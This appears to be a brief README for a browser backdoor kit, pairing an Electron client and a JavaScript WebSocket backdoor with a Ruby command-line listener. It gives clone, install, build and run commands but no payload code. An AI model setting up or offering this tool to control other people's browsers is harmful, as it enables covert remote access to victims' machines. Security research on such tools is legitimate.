A Simple Ruby Websocket Backdoor And Ruby Command Line Listener
BrowserExploit is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.
The JavaScript backdoor in BrowserExploit can be used on all browsers that support WebSockets.
It will not have access to the Electron API of the host computer unless the BrowserBackdoor Client application is used.
git clone https://github.com/IMcPwn/browser-backdoor
cd browser-backdoor
How to install and run the BrowserExploit client application:
cd client
npm install
npm start
How to build client executables (see here for more information):
cd client
npm install electron-packager -g
electron-packager . --all
How to run BrowserExploit:
cd server
gem install bundler
bundle install
ruby browserexploit.rb